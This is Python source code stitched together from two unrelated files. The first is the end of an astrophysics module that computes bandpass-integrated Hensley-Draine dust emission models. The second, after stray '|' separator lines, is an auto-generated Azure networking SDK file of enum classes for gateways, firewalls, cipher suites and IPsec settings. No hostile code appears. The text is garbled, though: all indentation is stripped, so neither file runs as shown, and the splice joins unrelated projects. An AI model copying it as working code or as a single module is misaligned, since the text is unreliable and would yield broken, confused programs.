population_signals = [component_class(dic).signal(**kwargs) for dic in dictionary_list]
# sigs is now a list of functions. Each function is the emission
# due to a population of the component.
def total_signal(nu, **kwargs):
total_component_signal = 0
# now sum up the contributions of each population at
# frequency nu.
for population_signal in population_signals:
total_component_signal += population_signal(nu, **kwargs)
return total_component_signal
# return the total contribution from all populations
# as a function of frequency nu.
return total_signal
def initialise_hd_dust_model_bandpass(hd_unint_signal, mpi_comm, **kwargs):
"""Function to initialise the bandpass-integrated
version of the Hensley-Draine 2017 model.
The keyword arguments are expected to be the initialisation
dictionary for the HD dust component.
:param hd_unint_signal: signal of the un-integrated HD17 model.
:type hd_unint_signal: function
"""
#Draw map of uval using Commander dust data.
uval = Dust.draw_uval(kwargs['draw_uval_seed'], kwargs['nside'], mpi_comm)
if "pixel_indices" in kwargs and kwargs["pixel_indices"] is not None:
uval = uval[kwargs["pixel_indices"]]
#Read in the precomputed dust emission spectra as a function of lambda and U.
data_sil, data_silfe, data_car, wav, uvec = Dust.read_hd_data()
c = 2.99792458e10
fcar = kwargs['fcar']
f_fe = kwargs['f_fe']
#Interpolate the dust emission properties in uval and freuency, this is necessary to compute the factor to
#rescale the dust emission templates to the new model.
sil_i = interpolate.RectBivariateSpline(uvec,wav,(data_sil[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
car_i = interpolate.RectBivariateSpline(uvec,wav,(data_car[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
silfe_i = interpolate.RectBivariateSpline(uvec,wav,(data_silfe[:,3:84]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
sil_p = interpolate.RectBivariateSpline(uvec,wav,(data_sil[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
car_p = interpolate.RectBivariateSpline(uvec,wav,(data_car[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
silfe_p = interpolate.RectBivariateSpline(uvec,wav,(data_silfe[:,84:165]*(wav[:,np.newaxis]*1.e-4/c)*1.e23).T) # to Jy/sr/H
nu_to_lambda = lambda x: 1.e-3 * constants.c / x #Note this is in SI units.
non_int_model_i = lambda nu: (1. - f_fe) * sil_i.ev(uval, nu_to_lambda(nu)) + fcar * car_i.ev(uval, nu_to_lambda(nu)) + f_fe * silfe_i.ev(uval, nu_to_lambda(nu))
non_int_model_p = lambda nu: (1. - f_fe) * sil_p.ev(uval, nu_to_lambda(nu)) + fcar * car_p.ev(uval, nu_to_lambda(nu)) + f_fe * silfe_p.ev(uval, nu_to_lambda(nu))
A_I = kwargs['A_I'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_I']) / non_int_model_i(kwargs['nu_0_I'])
A_Q = kwargs['A_Q'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_P']) / non_int_model_p(kwargs['nu_0_P'])
A_U = kwargs['A_U'] * convert_units("uK_RJ", "Jysr", kwargs['nu_0_P']) / non_int_model_p(kwargs['nu_0_P'])
def bpass_model(channel):
"""Note that nu is in GHz, and so we have to multipl by 1.e9 in the following functions.
"""
(nu, t_nu) = channel
# Integrate table over bandpass.
sil_i_vec = np.zeros(len(uvec))
car_i_vec = np.zeros(len(uvec))
silfe_i_vec = np.zeros(len(uvec))
sil_p_vec = np.zeros(len(uvec))
car_p_vec = np.zeros(len(uvec))
silfe_p_vec = np.zeros(len(uvec))
for i in range(len(uvec)):
# Note: Table in terms of wavelength in um, increasing
# and lambda*I_lambda. Thus we reverse the order
# to nu increasing before interpolating to the
# bandpass frequencies, then divide by nu to get
# I_nu.
sil_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_sil[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
car_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_car[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
silfe_i_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_silfe[::-1,3+i]*1.e23)/nu*1.e-9, nu*1.e9)
sil_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_sil[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
car_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_car[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
silfe_p_vec[i] = np.trapz(t_nu*np.interp(nu*1.e9,c/(wav[::-1]*1.e-4),data_silfe[::-1,84+i]*1.e23)/nu*1.e-9, nu*1.e9)
# Step 2: Interpolate over U values
sil_i = interpolate.interp1d(uvec, sil_i_vec)
car_i = interpolate.interp1d(uvec, car_i_vec)
silfe_i = interpolate.interp1d(uvec, silfe_i_vec)
sil_p = interpolate.interp1d(uvec, sil_p_vec)
car_p = interpolate.interp1d(uvec, car_p_vec)
silfe_p = interpolate.interp1d(uvec, silfe_p_vec)
#We now compute the final scaling. The integrated quantities sil_i,
#car_i silfe_i etc.. are in Jy/sr. Therefore we want to convert the
#templates from uK_RJ to Jy/sr.
scaling_I = ((1. - f_fe) * sil_i(uval) + fcar * car_i(uval) + f_fe * silfe_i(uval))
scaling_P = ((1. - f_fe) * sil_p(uval) + fcar * car_p(uval) + f_fe * silfe_p(uval))
return np.array([scaling_I * A_I, scaling_P * A_Q, scaling_P * A_U])
return bpass_model
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class Access(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates whether the traffic is allowed or denied.
"""
ALLOW = "Allow"
DENY = "Deny"
class ApplicationGatewayBackendHealthServerHealth(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Health of backend server.
"""
UNKNOWN = "Unknown"
UP = "Up"
DOWN = "Down"
PARTIAL = "Partial"
DRAINING = "Draining"
class ApplicationGatewayCookieBasedAffinity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Cookie based affinity.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ApplicationGatewayCustomErrorStatusCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Status code of the application gateway customer error.
"""
HTTP_STATUS403 = "HttpStatus403"
HTTP_STATUS502 = "HttpStatus502"
class ApplicationGatewayFirewallMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Web application firewall mode.
"""
DETECTION = "Detection"
PREVENTION = "Prevention"
class ApplicationGatewayOperationalState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Operational state of the application gateway resource.
"""
STOPPED = "Stopped"
STARTING = "Starting"
RUNNING = "Running"
STOPPING = "Stopping"
class ApplicationGatewayProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The protocol used to communicate with the backend. Possible values are 'Http' and 'Https'.
"""
HTTP = "Http"
HTTPS = "Https"
class ApplicationGatewayRedirectType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
PERMANENT = "Permanent"
FOUND = "Found"
SEE_OTHER = "SeeOther"
TEMPORARY = "Temporary"
class ApplicationGatewayRequestRoutingRuleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Rule type.
"""
BASIC = "Basic"
PATH_BASED_ROUTING = "PathBasedRouting"
class ApplicationGatewaySkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of an application gateway SKU.
"""
STANDARD_SMALL = "Standard_Small"
STANDARD_MEDIUM = "Standard_Medium"
STANDARD_LARGE = "Standard_Large"
WAF_MEDIUM = "WAF_Medium"
WAF_LARGE = "WAF_Large"
STANDARD_V2 = "Standard_v2"
WAF_V2 = "WAF_v2"
class ApplicationGatewaySslCipherSuite(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Ssl cipher suites enums.
"""
TLS_ECDHE_RSA_WITH_AES256_CBC_SHA384 = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
TLS_ECDHE_RSA_WITH_AES128_CBC_SHA256 = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
TLS_ECDHE_RSA_WITH_AES256_CBC_SHA = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
TLS_ECDHE_RSA_WITH_AES128_CBC_SHA = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
TLS_DHE_RSA_WITH_AES256_GCM_SHA384 = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
TLS_DHE_RSA_WITH_AES128_GCM_SHA256 = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
TLS_DHE_RSA_WITH_AES256_CBC_SHA = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
TLS_DHE_RSA_WITH_AES128_CBC_SHA = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
TLS_RSA_WITH_AES256_GCM_SHA384 = "TLS_RSA_WITH_AES_256_GCM_SHA384"
TLS_RSA_WITH_AES128_GCM_SHA256 = "TLS_RSA_WITH_AES_128_GCM_SHA256"
TLS_RSA_WITH_AES256_CBC_SHA256 = "TLS_RSA_WITH_AES_256_CBC_SHA256"
TLS_RSA_WITH_AES128_CBC_SHA256 = "TLS_RSA_WITH_AES_128_CBC_SHA256"
TLS_RSA_WITH_AES256_CBC_SHA = "TLS_RSA_WITH_AES_256_CBC_SHA"
TLS_RSA_WITH_AES128_CBC_SHA = "TLS_RSA_WITH_AES_128_CBC_SHA"
TLS_ECDHE_ECDSA_WITH_AES256_GCM_SHA384 = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
TLS_ECDHE_ECDSA_WITH_AES128_GCM_SHA256 = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
TLS_ECDHE_ECDSA_WITH_AES256_CBC_SHA384 = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
TLS_ECDHE_ECDSA_WITH_AES128_CBC_SHA256 = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
TLS_ECDHE_ECDSA_WITH_AES256_CBC_SHA = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
TLS_ECDHE_ECDSA_WITH_AES128_CBC_SHA = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
TLS_DHE_DSS_WITH_AES256_CBC_SHA256 = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
TLS_DHE_DSS_WITH_AES128_CBC_SHA256 = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
TLS_DHE_DSS_WITH_AES256_CBC_SHA = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
TLS_DHE_DSS_WITH_AES128_CBC_SHA = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
TLS_RSA_WITH3_DES_EDE_CBC_SHA = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
TLS_DHE_DSS_WITH3_DES_EDE_CBC_SHA = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
TLS_ECDHE_RSA_WITH_AES128_GCM_SHA256 = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
TLS_ECDHE_RSA_WITH_AES256_GCM_SHA384 = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
class ApplicationGatewaySslPolicyName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Ssl predefined policy name enums.
"""
APP_GW_SSL_POLICY20150501 = "AppGwSslPolicy20150501"
APP_GW_SSL_POLICY20170401 = "AppGwSslPolicy20170401"
APP_GW_SSL_POLICY20170401_S = "AppGwSslPolicy20170401S"
class ApplicationGatewaySslPolicyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Type of Ssl Policy
"""
PREDEFINED = "Predefined"
CUSTOM = "Custom"
class ApplicationGatewaySslProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Ssl protocol enums.
"""
TL_SV1_0 = "TLSv1_0"
TL_SV1_1 = "TLSv1_1"
TL_SV1_2 = "TLSv1_2"
class ApplicationGatewayTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Tier of an application gateway.
"""
STANDARD = "Standard"
WAF = "WAF"
STANDARD_V2 = "Standard_v2"
WAF_V2 = "WAF_v2"
class AssociationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The association type of the child resource to the parent resource.
"""
ASSOCIATED = "Associated"
CONTAINS = "Contains"
class AuthenticationMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""VPN client Authentication Method. Possible values are: 'EAPTLS' and 'EAPMSCHAPv2'.
"""
EAPTLS = "EAPTLS"
EAPMSCHA_PV2 = "EAPMSCHAPv2"
class AuthorizationUseStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""AuthorizationUseStatus. Possible values are: 'Available' and 'InUse'.
"""
AVAILABLE = "Available"
IN_USE = "InUse"
class AzureFirewallApplicationRuleProtocolType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The protocol type of a Application Rule resource
"""
HTTP = "Http"
HTTPS = "Https"
class AzureFirewallNatRCActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The action type of a NAT rule collection
"""
SNAT = "Snat"
DNAT = "Dnat"
class AzureFirewallNetworkRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The protocol of a Network Rule resource
"""
TCP = "TCP"
UDP = "UDP"
ANY = "Any"
ICMP = "ICMP"
class AzureFirewallRCActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The action type of a rule collection
"""
ALLOW = "Allow"
DENY = "Deny"
class BgpPeerState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The BGP peer state
"""
UNKNOWN = "Unknown"
STOPPED = "Stopped"
IDLE = "Idle"
CONNECTING = "Connecting"
CONNECTED = "Connected"
class CircuitConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Express Route Circuit Connection State. Possible values are: 'Connected' and 'Disconnected'.
"""
CONNECTED = "Connected"
CONNECTING = "Connecting"
DISCONNECTED = "Disconnected"
class ConnectionMonitorSourceStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Status of connection monitor source.
"""
UKNOWN = "Uknown"
ACTIVE = "Active"
INACTIVE = "Inactive"
class ConnectionState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The connection state.
"""
REACHABLE = "Reachable"
UNREACHABLE = "Unreachable"
UNKNOWN = "Unknown"
class ConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The connection status.
"""
UNKNOWN = "Unknown"
CONNECTED = "Connected"
DISCONNECTED = "Disconnected"
DEGRADED = "Degraded"
class DhGroup(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The DH Groups used in IKE Phase 1 for initial SA.
"""
NONE = "None"
DH_GROUP1 = "DHGroup1"
DH_GROUP2 = "DHGroup2"
DH_GROUP14 = "DHGroup14"
DH_GROUP2048 = "DHGroup2048"
ECP256 = "ECP256"
ECP384 = "ECP384"
DH_GROUP24 = "DHGroup24"
class Direction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The direction of the packet represented as a 5-tuple.
"""
INBOUND = "Inbound"
OUTBOUND = "Outbound"
class EffectiveRouteSource(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Who created the route. Possible values are: 'Unknown', 'User', 'VirtualNetworkGateway', and
'Default'.
"""
UNKNOWN = "Unknown"
USER = "User"
VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
DEFAULT = "Default"
class EffectiveRouteState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The value of effective route. Possible values are: 'Active' and 'Invalid'.
"""
ACTIVE = "Active"
INVALID = "Invalid"
class EffectiveSecurityRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The network protocol this rule applies to. Possible values are: 'Tcp', 'Udp', and 'All'.
"""
TCP = "Tcp"
UDP = "Udp"
ALL = "All"
class EvaluationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Connectivity analysis evaluation state.
"""
NOT_STARTED = "NotStarted"
IN_PROGRESS = "InProgress"
COMPLETED = "Completed"
class ExpressRouteCircuitPeeringAdvertisedPublicPrefixState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""AdvertisedPublicPrefixState of the Peering resource. Possible values are 'NotConfigured',
'Configuring', 'Configured', and 'ValidationNeeded'.
"""
NOT_CONFIGURED = "NotConfigured"
CONFIGURING = "Configuring"
CONFIGURED = "Configured"
VALIDATION_NEEDED = "ValidationNeeded"
class ExpressRouteCircuitPeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The state of peering. Possible values are: 'Disabled' and 'Enabled'
"""
DISABLED = "Disabled"
ENABLED = "Enabled"
class ExpressRouteCircuitSkuFamily(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The family of the SKU. Possible values are: 'UnlimitedData' and 'MeteredData'.
"""
UNLIMITED_DATA = "UnlimitedData"
METERED_DATA = "MeteredData"
class ExpressRouteCircuitSkuTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The tier of the SKU. Possible values are 'Standard', 'Premium' or 'Basic'.
"""
STANDARD = "Standard"
PREMIUM = "Premium"
BASIC = "Basic"
class ExpressRouteLinkAdminState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Administrative state of the physical port
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ExpressRouteLinkConnectorType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Physical fiber port type.
"""
LC = "LC"
SC = "SC"
class ExpressRoutePeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The state of peering. Possible values are: 'Disabled' and 'Enabled'
"""
DISABLED = "Disabled"
ENABLED = "Enabled"
class ExpressRoutePeeringType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The PeeringType. Possible values are: 'AzurePublicPeering', 'AzurePrivatePeering', and
'MicrosoftPeering'.
"""
AZURE_PUBLIC_PEERING = "AzurePublicPeering"
AZURE_PRIVATE_PEERING = "AzurePrivatePeering"
MICROSOFT_PEERING = "MicrosoftPeering"
class ExpressRoutePortsEncapsulation(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Encapsulation method on physical ports.
"""
DOT1_Q = "Dot1Q"
QIN_Q = "QinQ"
class FlowLogFormatType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The file type of flow log.
"""
JSON = "JSON"
class HTTPMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""HTTP method.
"""
GET = "Get"
class HubVirtualNetworkConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current state of the VirtualHub to vnet connection.
"""
UNKNOWN = "Unknown"
CONNECTING = "Connecting"
CONNECTED = "Connected"
NOT_CONNECTED = "NotConnected"
class IkeEncryption(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The IKE encryption algorithm (IKE phase 2).
"""
DES = "DES"
DES3 = "DES3"
AES128 = "AES128"
AES192 = "AES192"
AES256 = "AES256"
GCMAES256 = "GCMAES256"
GCMAES128 = "GCMAES128"
class IkeIntegrity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The IKE integrity algorithm (IKE phase 2).
"""
MD5 = "MD5"
SHA1 = "SHA1"
SHA256 = "SHA256"
SHA384 = "SHA384"
GCMAES256 = "GCMAES256"
GCMAES128 = "GCMAES128"
class IPAllocationMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""PrivateIP allocation method.
"""
STATIC = "Static"
DYNAMIC = "Dynamic"
class IpFlowProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Protocol to be verified on.
"""
TCP = "TCP"
UDP = "UDP"
class IpsecEncryption(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The IPSec encryption algorithm (IKE phase 1).
"""
NONE = "None"
DES = "DES"
DES3 = "DES3"
AES128 = "AES128"
AES192 = "AES192"
AES256 = "AES256"
GCMAES128 = "GCMAES128"
GCMAES192 = "GCMAES192"
GCMAES256 = "GCMAES256"
class IpsecIntegrity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The IPSec integrity algorithm (IKE phase 1).
"""
MD5 = "MD5"
SHA1 = "SHA1"
SHA256 = "SHA256"
GCMAES128 = "GCMAES128"
GCMAES192 = "GCMAES192"
GCMAES256 = "GCMAES256"
class IPVersion(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Available from Api-Version 2016-03-30 onwards, it represents whether the specific
ipconfiguration is IPv4 or IPv6. Default is taken as IPv4. Possible values are: 'IPv4' and
'IPv6'.
"""
I_PV4 = "IPv4"
I_PV6 = "IPv6"
class IssueType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of issue.
"""
UNKNOWN = "Unknown"
AGENT_STOPPED = "AgentStopped"
GUEST_FIREWALL = "GuestFirewall"
DNS_RESOLUTION = "DnsResolution"
SOCKET_BIND = "SocketBind"
NETWORK_SECURITY_RULE = "NetworkSecurityRule"
USER_DEFINED_ROUTE = "UserDefinedRoute"
PORT_THROTTLED = "PortThrottled"
PLATFORM = "Platform"
class LoadBalancerSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of a load balancer SKU.
"""
BASIC = "Basic"
STANDARD = "Standard"
class LoadDistribution(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The load distribution policy for this rule. Possible values are 'Default', 'SourceIP', and
'SourceIPProtocol'.
"""
DEFAULT = "Default"
SOURCE_IP = "SourceIP"
SOURCE_IP_PROTOCOL = "SourceIPProtocol"
class NetworkOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Status of the Azure async operation. Possible values are: 'InProgress', 'Succeeded', and
'Failed'.
"""
IN_PROGRESS = "InProgress"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class NextHopType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Next hop type.
"""
INTERNET = "Internet"
VIRTUAL_APPLIANCE = "VirtualAppliance"
VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
VNET_LOCAL = "VnetLocal"
HYPER_NET_GATEWAY = "HyperNetGateway"
NONE = "None"
class OfficeTrafficCategory(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The office traffic category.
"""
OPTIMIZE = "Optimize"
OPTIMIZE_AND_ALLOW = "OptimizeAndAllow"
ALL = "All"
NONE = "None"
class Origin(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The origin of the issue.
"""
LOCAL = "Local"
INBOUND = "Inbound"
OUTBOUND = "Outbound"
class OutboundRulePropertiesFormatProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Protocol - TCP, UDP or All
"""
TCP = "Tcp"
UDP = "Udp"
ALL = "All"
class PcError(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
INTERNAL_ERROR = "InternalError"
AGENT_STOPPED = "AgentStopped"
CAPTURE_FAILED = "CaptureFailed"
LOCAL_FILE_FAILED = "LocalFileFailed"
STORAGE_FAILED = "StorageFailed"
class PcProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Protocol to be filtered on.
"""
TCP = "TCP"
UDP = "UDP"
ANY = "Any"
class PcStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The status of the packet capture session.
"""
NOT_STARTED = "NotStarted"
RUNNING = "Running"
STOPPED = "Stopped"
ERROR = "Error"
UNKNOWN = "Unknown"
class PfsGroup(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The Pfs Groups used in IKE Phase 2 for new child SA.
"""
NONE = "None"
PFS1 = "PFS1"
PFS2 = "PFS2"
PFS2048 = "PFS2048"
ECP256 = "ECP256"
ECP384 = "ECP384"
PFS24 = "PFS24"
PFS14 = "PFS14"
PFSMM = "PFSMM"
class ProbeProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The protocol of the end point. Possible values are: 'Http', 'Tcp', or 'Https'. If 'Tcp' is
specified, a received ACK is required for the probe to be successful. If 'Http' or 'Https' is
specified, a 200 OK response from the specifies URI is required for the probe to be successful.
"""
HTTP = "Http"
TCP = "Tcp"
HTTPS = "Https"
class ProcessorArchitecture(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""VPN client Processor Architecture. Possible values are: 'AMD64' and 'X86'.
"""
AMD64 = "Amd64"
X86 = "X86"
class Protocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network protocol.
"""
TCP = "Tcp"
HTTP = "Http"
HTTPS = "Https"
ICMP = "Icmp"
class ProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current provisioning state.
"""
SUCCEEDED = "Succeeded"
UPDATING = "Updating"
DELETING = "Deleting"
FAILED = "Failed"
class PublicIPAddressSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of a public IP address SKU.
"""
BASIC = "Basic"
STANDARD = "Standard"
class PublicIPPrefixSkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of a public IP prefix SKU.
"""
STANDARD = "Standard"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity used for the resource. The type 'SystemAssigned, UserAssigned' includes
both an implicitly created identity and a set of user assigned identities. The type 'None' will
remove any identities from the virtual machine.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
NONE = "None"
class RouteFilterRuleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The rule type of the rule. Valid value is: 'Community'
"""
COMMUNITY = "Community"
class RouteNextHopType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of Azure hop the packet should be sent to. Possible values are:
'VirtualNetworkGateway', 'VnetLocal', 'Internet', 'VirtualAppliance', and 'None'.
"""
VIRTUAL_NETWORK_GATEWAY = "VirtualNetworkGateway"
VNET_LOCAL = "VnetLocal"
INTERNET = "Internet"
VIRTUAL_APPLIANCE = "VirtualAppliance"
NONE = "None"
class SecurityRuleAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Whether network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
"""
ALLOW = "Allow"
DENY = "Deny"
class SecurityRuleDirection(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The direction of the rule. Possible values are: 'Inbound and Outbound'.
"""
INBOUND = "Inbound"
OUTBOUND = "Outbound"
class SecurityRuleProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
"""
TCP = "Tcp"
UDP = "Udp"
ASTERISK = "*"
class ServiceProviderProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The ServiceProviderProvisioningState state of the resource. Possible values are
'NotProvisioned', 'Provisioning', 'Provisioned', and 'Deprovisioning'.
"""
NOT_PROVISIONED = "NotProvisioned"
PROVISIONING = "Provisioning"
PROVISIONED = "Provisioned"
DEPROVISIONING = "Deprovisioning"
class Severity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The severity of the issue.
"""
ERROR = "Error"
WARNING = "Warning"
class TransportProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The transport protocol for the endpoint. Possible values are 'Udp' or 'Tcp' or 'All'.
"""
UDP = "Udp"
TCP = "Tcp"
ALL = "All"
class TunnelConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current state of the tunnel.
"""
UNKNOWN = "Unknown"
CONNECTING = "Connecting"
CONNECTED = "Connected"
NOT_CONNECTED = "NotConnected"
class UsageUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""An enum describing the unit of measurement.
"""
COUNT = "Count"
class VerbosityLevel(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Verbosity level. Accepted values are 'Normal', 'Minimum', 'Full'.
"""
NORMAL = "Normal"
MINIMUM = "Minimum"
FULL = "Full"
class VirtualNetworkGatewayConnectionProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Gateway connection protocol. Possible values are: 'IKEv2', 'IKEv1'.
"""
IK_EV2 = "IKEv2"
IK_EV1 = "IKEv1"
